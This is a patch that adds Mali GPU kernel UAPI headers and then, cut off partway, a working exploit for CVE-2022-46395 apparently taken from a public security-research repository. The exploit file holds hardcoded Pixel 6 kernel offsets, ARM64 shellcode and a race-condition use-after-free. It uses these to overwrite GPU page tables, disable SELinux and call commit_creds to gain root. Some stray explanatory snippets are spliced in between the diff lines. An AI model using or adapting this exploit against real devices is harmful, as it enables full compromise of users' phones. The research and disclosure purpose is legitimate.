10.3 a core_req field of a __u32 type was added to the end of the + * structure, and the place in the structure previously occupied by __u16 + * core_req was kept but renamed to compat_core_req. + * + * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2]. + * Compatibility with UK 10.x from UK 11.y is not handled because + * the major version increase prevents this. + * + * For UK 11.20 jit_id[2] must be initialized to zero. 
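Since only the four levels above are valid, userspace can probe the highest level a context is actually allowed to use with KBASE_IOCTL_CONTEXT_PRIORITY_CHECK from the ioctl header earlier in this patch, where @priority is an IN/OUT field:

struct kbase_ioctl_context_priority_check chk = {
    .priority = BASE_JD_PRIO_REALTIME,
};
if (ioctl(mali_fd, KBASE_IOCTL_CONTEXT_PRIORITY_CHECK, &chk) == 0) {
    /* chk.priority now holds the best level this context may use */
}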
+ */ +struct base_jd_atom_v2 { + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +}; + +/** + * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr + * at the beginning. + * + * @seq_nr: Sequence number of logical grouping of atoms. + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign + * this field; this is done in order to reduce possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + */ +typedef struct base_jd_atom { + __u64 seq_nr; + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +} base_jd_atom; + +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/* Job chain event code bits + * Defines the bits used to create ::base_jd_event_code + */ +enum { + BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */ + BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */ + /* Event indicates success (SW events only) */ + BASE_JD_SW_EVENT_SUCCESS = (1u << 13), + BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */ + BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */ + BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */ + BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */ + /* Mask to extract the type from an event code */ + BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11) +}; + +/** + * enum base_jd_event_code - Job chain event codes + * + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status + * codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, because the + * job was hard-stopped. + * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as + * 'previous job done'. 
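A hedged sketch of handing one such atom to the driver. struct kbase_ioctl_job_submit (fields addr/nr_atoms/stride) and KBASE_IOCTL_JOB_SUBMIT live in the companion kbase ioctl header, not in this excerpt, so treat those names as assumptions; event_va is a hypothetical GPU VA of a soft-event byte:

struct base_jd_atom_v2 atom = {0};
atom.core_req = BASE_JD_REQ_SOFT_EVENT_SET;
atom.jc = event_va;
atom.atom_number = next_atom++;

struct kbase_ioctl_job_submit submit = {
    .addr = (__u64)(uintptr_t)&atom,
    .nr_atoms = 1,
    .stride = sizeof(atom),
};
ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit);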
+ * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes + * TERMINATED, DONE or JOB_CANCELLED. + * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job + * was hard stopped. + * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on + * complete/fail/cancel. + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, + * because the job was hard-stopped. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status + * codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes. + * Such codes are never returned to + * user-space. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes. + * @BASE_JD_EVENT_DONE: atom has completed successfull + * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which + * shall result in a failed atom + * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the + * part of the memory system required to access + * job descriptors was not powered on + * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job + * manager failed + * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job + * manager failed + * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the + * specified affinity mask does not intersect + * any available cores + * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job + * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program + * counter was executed. + * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal + * encoding was executed. + * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where + * the instruction encoding did not match the + * instruction type encoded in the program + * counter. + * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that + * contained invalid combinations of operands. + * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried + * to access the thread local storage section + * of another thread. + * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that + * tried to do an unsupported unaligned memory + * access. + * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that + * failed to complete an instruction barrier. + * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job + * contains invalid combinations of data. + * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to + * process a tile that is entirely outside the + * bounding box of the frame. + * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address + * has been found that exceeds the virtual + * address range. + * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job. + * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only + * the first one the reports an error will set + * and return full error information. 
+ * Subsequent failing jobs will not update the + * error status registers, and may write an + * error status of UNKNOWN. + * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to + * physical memory where the original virtual + * address is no longer available. + * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache + * has detected that the same line has been + * accessed as both shareable and non-shareable + * memory from inside the GPU. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table + * entry at level 1 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table + * entry at level 2 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table + * entry at level 3 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table + * entry at level 4 of the translation table. + * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to + * the permission flags set in translation + * table + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading + * level 0 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading + * level 1 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading + * level 2 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading + * level 3 of the translation tables. + * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a + * translation table entry with the ACCESS_FLAG + * bit set to zero in level 0 of the + * page table, and the DISABLE_AF_FAULT flag + * was not set. + * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to + * grow memory on demand + * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its + * dependencies failed + * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data + * in the atom which overlaps with + * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the + * platform doesn't support the feature specified in + * the atom. + * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used + * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used + * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used + * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate + * to userspace that the KBase context has been + * destroyed and Base should stop listening for + * further events + * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in + * the GPU has to be retried (but it has not + * started) due to e.g., GPU reset + * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal + * the completion of a renderpass. This value + * shouldn't be returned to userspace but I haven't + * seen where it is reset back to JD_EVENT_DONE. + * + * HW and low-level SW events are represented by event codes. + * The status of jobs which succeeded are also represented by + * an event code (see @BASE_JD_EVENT_DONE). + * Events are usually reported as part of a &struct base_jd_event. 
+ * + * The event codes are encoded in the following way: + * * 10:0 - subtype + * * 12:11 - type + * * 13 - SW success (only valid if the SW bit is set) + * * 14 - SW event (HW event if not set) + * * 15 - Kernel event (should never be seen in userspace) + * + * Events are split up into ranges as follows: + * * BASE_JD_EVENT_RANGE__START + * * BASE_JD_EVENT_RANGE__END + * + * code is in 's range when: + * BASE_JD_EVENT_RANGE__START <= code < + * BASE_JD_EVENT_RANGE__END + * + * Ranges can be asserted for adjacency by testing that the END of the previous + * is equal to the START of the next. This is useful for optimizing some tests + * for range. + * + * A limitation is that the last member of this enum must explicitly be handled + * (with an assert-unreachable statement) in switch statements that use + * variables of this type. Otherwise, the compiler warns that we have not + * handled that enum value. + */ +enum base_jd_event_code { + /* HW defined exceptions */ + BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0, + + /* non-fatal exceptions */ + BASE_JD_EVENT_NOT_STARTED = 0x00, + BASE_JD_EVENT_DONE = 0x01, + BASE_JD_EVENT_STOPPED = 0x03, + BASE_JD_EVENT_TERMINATED = 0x04, + BASE_JD_EVENT_ACTIVE = 0x08, + + BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40, + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40, + + /* job exceptions */ + BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40, + BASE_JD_EVENT_JOB_POWER_FAULT = 0x41, + BASE_JD_EVENT_JOB_READ_FAULT = 0x42, + BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43, + BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44, + BASE_JD_EVENT_JOB_BUS_FAULT = 0x48, + BASE_JD_EVENT_INSTR_INVALID_PC = 0x50, + BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51, + BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52, + BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53, + BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54, + BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55, + BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56, + BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58, + BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59, + BASE_JD_EVENT_STATE_FAULT = 0x5A, + BASE_JD_EVENT_OUT_OF_MEMORY = 0x60, + BASE_JD_EVENT_UNKNOWN = 0x7F, + + /* GPU exceptions */ + BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80, + BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88, + + /* MMU exceptions */ + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3, + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4, + BASE_JD_EVENT_PERMISSION_FAULT = 0xC8, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3, + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4, + BASE_JD_EVENT_ACCESS_FLAG = 0xD8, + + /* SW defined exceptions */ + BASE_JD_EVENT_MEM_GROWTH_FAILED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_TIMED_OUT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001, + BASE_JD_EVENT_JOB_CANCELLED = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002, + BASE_JD_EVENT_JOB_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003, + BASE_JD_EVENT_PM_EVENT = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004, + + BASE_JD_EVENT_BAG_INVALID = + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003, + + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | 0x000, + + BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_BAG_DONE = 
BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS | + BASE_JD_SW_EVENT_BAG | 0x000, + BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000, + + BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | 0x000, + BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000, + BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001, + + BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT | + BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF +}; + +/** + * struct base_jd_event_v2 - Event reporting structure + * + * @event_code: event code. + * @atom_number: the atom number that has completed. + * @udata: user data. + * + * This structure is used by the kernel driver to report information + * about GPU events. They can either be HW-specific events or low-level + * SW events, such as job-chain completion. + * + * The event code contains an event type field which can be extracted + * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK. + */ +struct base_jd_event_v2 { + enum base_jd_event_code event_code; + base_atom_id atom_number; + struct base_jd_udata udata; +}; + +/** + * struct base_dump_cpu_gpu_counters - Structure for + * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS + * jobs. + * @system_time: gpu timestamp + * @cycle_counter: gpu cycle count + * @sec: cpu time(sec) + * @usec: cpu time(usec) + * @padding: padding + * + * This structure is stored into the memory pointed to by the @jc field + * of &struct base_jd_atom. + * + * It must not occupy the same CPU cache line(s) as any neighboring data. + * This is to avoid cases where access to pages containing the structure + * is shared between cached and un-cached memory regions, which would + * cause memory corruption. 
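Userspace normally consumes these records by read()ing them straight off the kbase file descriptor; that delivery model is standard kbase behaviour but is not shown in this patch, so the sketch below is hedged accordingly:

struct base_jd_event_v2 ev;
while (read(mali_fd, &ev, sizeof(ev)) == (ssize_t)sizeof(ev)) {
    unsigned int type = ev.event_code & BASE_JD_SW_EVENT_TYPE_MASK;
    if (ev.event_code != BASE_JD_EVENT_DONE)
        fprintf(stderr, "atom %u: event 0x%x (type bits 0x%x)\n",
                ev.atom_number, ev.event_code, type);
}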
+ */ + +struct base_dump_cpu_gpu_counters { + __u64 system_time; + __u64 cycle_counter; + __u64 sec; + __u32 usec; + __u8 padding[36]; +}; + +#endif /* _UAPI_BASE_JM_KERNEL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c new file mode 100644 index 0000000..624de53 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c @@ -0,0 +1,670 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "mali.h" +#include "mali_base_jm_kernel.h" +#include "mempool_utils.h" +#include "mem_write.h" + +#define MALI "/dev/mali0" + +#define PAGE_SHIFT 12 + +#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576) + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +#define PFN_DOWN(x) ((x) >> PAGE_SHIFT) + +#define UNMAP_CPU 1 + +#define UPDATE_CPU 0 + +#define WAIT_CPU 2 + +#define NB_PREEMPT_THREAD 32 + +#define NR_WATCHES 100 //5000 +#define NR_EPFDS 500 + +#define TEST_ENT 3 + +#define NSEC_PER_SEC 1000000000UL + +#define DEFAULT_WAIT 505 + +#define CORRUPTED_VA_SIZE 500 + +#define CORRUPTED_COMMIT_SIZE 10 + +#define AVC_DENY_2211 0x8d6810 + +#define SEL_READ_ENFORCE_2211 0x8ea124 + +#define INIT_CRED_2211 0x2fd1388 + +#define COMMIT_CREDS_2211 0x17ada4 + +#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388 + +#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4 + +#define AVC_DENY_2212 0x8ba710 + +#define SEL_READ_ENFORCE_2212 0x8cdfd4 + +#define INIT_CRED_2212 0x2fd1418 + +#define COMMIT_CREDS_2212 0x177ee4 + +#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4 + +#define AVC_DENY_2301 0x8ba710 + +#define SEL_READ_ENFORCE_2301 0x8cdfd4 + +#define INIT_CRED_2301 0x2fd1418 + +#define COMMIT_CREDS_2301 0x177ee4 + +#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418 + +#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4 + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2211; + +static uint64_t avc_deny = AVC_DENY_2211; + +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static uint64_t uevent; +static uint8_t atom_number = 0; +static volatile int g_ready_unmap = 0; +static struct timespec unmap_time; +static struct timespec finished_fault_time; +static uint8_t g_initial_read = TEST_ENT; +static int need_reset_fd = 0; +static volatile bool success = false; +static int error_code = 0; +static struct timespec finished_reset_time; +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; +static uint64_t corrupted_region = 0; +static uint64_t benchmark_time = DEFAULT_WAIT; +static uint64_t this_benchmark_time = 0; + +#define OFF 4 + +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) + + +void select_offset() { + char fingerprint[256]; + int len = __system_property_get("ro.build.fingerprint", fingerprint); + LOG("fingerprint: %s\n", fingerprint); + if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) { + avc_deny = AVC_DENY_2211; + sel_read_enforce = SEL_READ_ENFORCE_2211; + fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211, &(root_code[0])); + return; + } + if 
(!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) { + avc_deny = AVC_DENY_2212; + sel_read_enforce = SEL_READ_ENFORCE_2212; + fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212, &(root_code[0])); + return; + } + if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) { + avc_deny = AVC_DENY_2301; + sel_read_enforce = SEL_READ_ENFORCE_2301; + fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301, &(root_code[0])); + return; + } + + err(1, "unable to match build id\n"); +} + +static int io_setup(unsigned nr, aio_context_t *ctxp) +{ + return syscall(__NR_io_setup, nr, ctxp); +} + +static int io_destroy(aio_context_t ctx) +{ + return syscall(__NR_io_destroy, ctx); +} + +void epoll_add(int epfd, int fd) { + struct epoll_event ev = { .events = EPOLLIN }; + SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev)); +} + +struct timespec get_mono_time(void) { + struct timespec ts; + SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts)); + return ts; +} + +inline unsigned long timespec_to_ns(struct timespec ts) { + return ts.tv_sec * NSEC_PER_SEC + ts.tv_nsec; +} + +void ts_sub(struct timespec *ts, unsigned long nsecs) { + if (ts->tv_nsec < nsecs) { + ts->tv_sec--; + ts->tv_nsec += NSEC_PER_SEC; + } + ts->tv_nsec -= nsecs; +} +void ts_add(struct timespec *ts, unsigned long nsecs) { + ts->tv_nsec += nsecs; + if (ts->tv_nsec >= NSEC_PER_SEC) { + ts->tv_sec++; + ts->tv_nsec -= NSEC_PER_SEC; + } +} +bool ts_is_in_future(struct timespec ts) { + struct timespec cur = get_mono_time(); + if (ts.tv_sec > cur.tv_sec) + return true; + if (ts.tv_sec < cur.tv_sec) + return false; + return ts.tv_nsec > cur.tv_nsec; +} + +void setup_timerfd() { + int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0)); + int tfd_dups[NR_WATCHES]; + for (int i=0; itv_sec < t2->tv_sec) return true; + if (t1->tv_sec > t2->tv_sec) return false; + return t1->tv_nsec < t2->tv_nsec; +} + +bool before_reset() { + return finished_reset_time.tv_sec == 0 || before(&finished_fault_time, &finished_reset_time); +} + +void* unmap_resources(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = (int)(arguments[0]); + + migrate_to_cpu(UNMAP_CPU); + struct kbase_ioctl_mem_free mem_free = {.gpu_addr = (64ul << 12) + 0x1000}; + + while (!g_ready_unmap); + while (ts_is_in_future(unmap_time)); + migrate_to_cpu(UNMAP_CPU); + g_initial_read = *(volatile uint8_t*)(uevent + OFF); + if (g_initial_read != TEST_ENT) return NULL; + ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free); + finished_fault_time = get_mono_time(); + if (!before_reset()) return NULL; +// LOG("finished reset time %ld %ld fault time %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, finished_fault_time.tv_sec, finished_fault_time.tv_nsec); + unmap_external_resource(mali_fd, uevent); + corrupted_region = (uint64_t)map_gpu(mali_fd, CORRUPTED_VA_SIZE, CORRUPTED_COMMIT_SIZE, false, 1); + +// struct timespec time_now = get_mono_time(); +// LOG("finished reset time: %ld %ld, finished map time: %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, time_now.tv_sec, time_now.tv_nsec); + return NULL; +} + +void check_success() { + if (error_code != 0 || g_initial_read != TEST_ENT) return; + if (finished_fault_time.tv_sec == 0) return; + if (finished_reset_time.tv_sec < finished_fault_time.tv_sec) return; + if (finished_reset_time.tv_sec > finished_fault_time.tv_sec) { + success = 1; + 
return; + } + if (finished_reset_time.tv_sec == finished_fault_time.tv_sec) { + if (finished_reset_time.tv_nsec > finished_fault_time.tv_nsec) { + success = 1; + return; + } + } + return; +} + +void* softjob_reset(void* arg) { + uint64_t* arguments = (uint64_t*)arg; + uint64_t benchmark = arguments[1]; + struct timespec start_benchmark_time; + struct kbase_ioctl_soft_event_update update= {0}; + update.event = benchmark ? 0 : uevent + OFF; + update.new_status = 0; + + int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0)); + int tfd_dups[NR_WATCHES]; + for (int i=0; i> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + atom_number = write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, atom_number); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + atom_number = write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, atom_number); + return atom_number; +} + +int find_pgd(uint64_t* gpu_addr, int* index) { + int ret = -1; + for (int pg = 0; pg < CORRUPTED_COMMIT_SIZE; pg++) { + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = gpu_addr[pg * 0x1000/8 + i]; + if ((entry & 0x443) == 0x443) { + *index = i; + return pg; + } + } + } + return ret; +} + +uint64_t benchmark() { + uint64_t time = 0; + int num_average = 30; + uint64_t arguments[2]; + int benchmark_fd = open_dev(MALI); + setup_mali(benchmark_fd, 0); + void* tracking_page2 = setup_tracking_page(benchmark_fd); + arguments[0] = benchmark_fd; + arguments[1] = 1; + for (int i = 0; i < num_average; i++) { + softjob_reset(&(arguments[0])); + time += this_benchmark_time/100; + } + printf("benchmark_time %ld\n", time/num_average); + close(benchmark_fd); + return time/num_average; +} + +int trigger(int mali_fd2) { + + int mali_fd = open_dev(MALI); + setup_mali(mali_fd, 0); + void* tracking_page = setup_tracking_page(mali_fd); + + aio_context_t ctx = 0; + uint32_t nr_events = 128; + int ret = io_setup(nr_events, &ctx); + if (ret < 0) err(1, "io_setup error\n"); + char* anon_mapping = (char*)ctx; + + migrate_to_cpu(WAIT_CPU); + *(volatile char *)(anon_mapping + OFF) = TEST_ENT; + + + uint64_t this_addr = (uint64_t)anon_mapping; + uint64_t imported_address = mem_import(mali_fd, this_addr); + void *gpu_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, + MAP_SHARED, mali_fd, imported_address); + if (gpu_mapping == MAP_FAILED) { + err(1, "gpu mapping failed\n"); + } + uint64_t jc = map_resource_job(mali_fd, atom_number++, (uint64_t)gpu_mapping); + map_external_resource(mali_fd, (uint64_t)gpu_mapping); + release_resource_job(mali_fd, atom_number++, jc); + uevent = (uint64_t)gpu_mapping; + + if (io_destroy(ctx) < 0) err(1, "unable to destroy aio ctx\n"); + + pthread_t thread; + uint64_t args[2]; + args[0] = mali_fd; + args[1] = 0; + + pthread_create(&thread, NULL, &unmap_resources, 